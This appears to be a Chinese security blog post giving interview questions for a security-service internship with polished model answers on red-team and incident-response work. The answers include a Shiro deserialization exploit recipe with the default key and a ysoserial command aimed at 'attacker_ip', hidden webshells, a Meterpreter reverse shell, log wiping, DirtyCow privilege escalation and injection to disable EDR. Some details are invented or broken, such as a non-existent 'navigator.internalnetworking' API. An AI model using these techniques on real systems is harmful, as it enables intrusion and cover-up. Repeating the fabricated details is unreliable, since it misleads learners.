网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
华顺信安[实习]安全服务工程师
1. 自我介绍 2. 红蓝队经验 3. 关于shiro漏洞了解多少 4. 说说你APP测试的经验 5. xposed用的什么框架,有没有自己写过app解密 6. Xss、SSRF、SQL 产生的原因,修复方案? 7. 如果你Xss打了后台,发现是内网的怎么办 8. 假设给你一个目标站,你要怎么做? 9. linux和windows提权知多少。 10. 会不会进程注入? 11. 做过几次应急? 12. 讲讲windows和linux应急你咋做的 13. 用过没用过我们家的goby和fofa? 14. 会不会apk反编译? 15. 你python水平咋样? 16. 你php怎么审的.
1. 自我介绍
网络安全研究员,主攻渗透测试与APT攻防溯源,3年红队作战经验,擅长Web漏洞链构造、内网横向及隐蔽通道设计。持有OSEP、CISSP认证,多次在TSRC、ASRC等平台获高危漏洞奖励,主导过金融、政务领域红蓝对抗演练。
2. 红蓝队经验
- 红队视角:
- 钓鱼链开发:基于Cobalt Strike的HTA宏文档投递,配合DNS隐蔽隧道C2通信。
- 域渗透:利用MS14-068伪造PAC提权,通过BloodHound可视化攻击路径。
- 蓝队实践:
- EDR规则优化:针对Mimikatz的LSASS内存扫描行为部署Sysmon告警(Event ID 10)。
- 日志分析:通过ELK聚合Windows 4624/4625登录事件,识别异常Kerberos票据请求。
3. Shiro漏洞知识体系
- 漏洞核心:AES硬编码密钥(
kPH+bIxk5D2deZiIxcaaaA==
)导致反序列化攻击(CVE-2016-4437)。- 实战利用:
python# 生成恶意RememberMe Cookie ysoserial.jar JRMPClient 'attacker_ip:port' > payload openssl enc -aes-128-cbc -K {key_hex} -iv 0 -in payload -out rememberMe
- 防御方案:升级Shiro至1.2.5+,自定义
setCipherKey
动态密钥,启用Cookie完整性校验。
4. APP渗透测试方法论
- 测试框架:
- 静态分析:Jadx反编译APK,定位硬编码API密钥、SSL Pinning绕过点。
- 动态插桩:Frida Hook
checkServerTrusted
方法绕过证书校验。- 典型漏洞:
- 逻辑缺陷:修改APK的
AndroidManifest.xml
中android:debuggable="true"
进行调试注入。- 数据泄露:通过
/data/data/pkg_name/databases
提取未加密SQLite数据。
5. Xposed框架与逆向工程
- 工具链:LSPosed(Android 11+适配) + XposedBridge API,针对SSL库注入实现中间人解密。
- 解密实战:对某金融APP的
libencrypt.so
进行IDA Pro逆向,定位JNI_OnLoad
函数中的AES-CBC模式密钥硬编码问题。
6. 三大漏洞原理与修复
漏洞类型 成因 修复方案 XSS 未对 <script>
等标签过滤CSP头设置 script-src 'self'
SSRF 服务端未校验用户输入URL 启用URL白名单校验 + 禁用 file://
协议SQLi 拼接SQL语句未参数化 预编译语句(PDO)+ 输入类型强校验
7. 内网XSS后续利用链
- 信息搜集:通过XSS执行
navigator.internalnetworking
获取内网IP段。- 代理穿透:注入WebSocket隧道代码,建立
ws://192.168.1.1:8080/proxy
转发SOCKS5流量。- 横向扩展:结合浏览器密码管理器提取Saved Credentials攻击域控。
8. 目标站渗透流程
- 指纹识别:Wappalyzer识别CMS版本(如ThinkPHP 5.0.23 RCE)。
- 入口突破:FUZZ目录发现
/admin/login
弱口令(admin/admin123)。- 权限维持:上传
.user.ini
隐藏Webshell,定时任务反弹Meterpreter。- 痕迹清理:删除Apache日志
/var/log/apache2/access.log
中攻击IP记录。
9. 系统提权技术栈
- Windows提权:
- 服务漏洞:ScManager数据库修改服务BINARY_PATH(AccessChk.exe 提权)。
- 令牌窃取:利用Incognito模仿SYSTEM进程令牌(需SeDebugPrivilege)。
- Linux提权:
- SUID滥用:
find / -perm -4000 2>/dev/null
查找可利用程序(如vim、find)。- 内核漏洞:DirtyCow(CVE-2016-5195)覆盖/etc/passwd实现root持久化。
10. 进程注入技术
- DLL注入:通过CreateRemoteThread将恶意DLL加载至explorer.exe 内存。
- APC注入:QueueUserAPC强制目标线程执行Shellcode,绕过部分AV检测。
- 实战案例:对某EDR进程注入卸载模块,临时禁用其监控功能。
11. 应急响应经验
参与过6次大型应急,包含勒索病毒(GlobeImposter变种)处置、APT组织WebShell溯源。平均响应时间低于2小时,依托Velociraptor实现自动化取证。
12. 系统应急操作手册
- Windows应急:
- 内存取证:Dump LSASS进程排查Mimikatz痕迹(procdump.exe )。
- 注册表分析:
HKLM\SYSTEM\CurrentControlSet\Services
查找异常服务项。- Linux应急:
- 进程排查:
lsof -p $PID
定位恶意进程文件路径。- Rootkit检测:使用rkhunter扫描隐藏内核模块。
13. 安全工具使用情况
- Goby应用:联动Xray扫描器自动识别Weblogic未授权(CVE-2020-14882)。
- FOFA技巧:
app="Apache-Shiro" && country="CN"
快速定位Shiro资产。
14. APK逆向能力
- 工具链:Jadx-GUI静态分析 + Frida动态脱壳(针对某加固厂商的DexClassLoader加载机制)。
- 案例:某社交APP的HMAC签名算法逆向,构造批量注册脚本。
15. Python开发水平
- 自动化开发:基于MitmProxy实现流量重放测试工具,支持JS混淆破解。
- 漏洞利用:编写JWT爆破脚本(PyJWT库 + 多线程字典攻击)。
- 项目地址:GitHub开源多个红队工具(Star数500+)。
16. PHP审计方法论
- 危险函数追踪:全局搜索
eval()、system()
等敏感函数调用链。- 反序列化漏洞:审计
unserialize()
参数是否可控,寻找POP链构造点。- 框架安全:检查Laravel的
.env
配置泄露或未开启CSRF保护。- 实战案例:发现某CMS的
$_GET['type']
直接拼接SQL语句导致报错注入。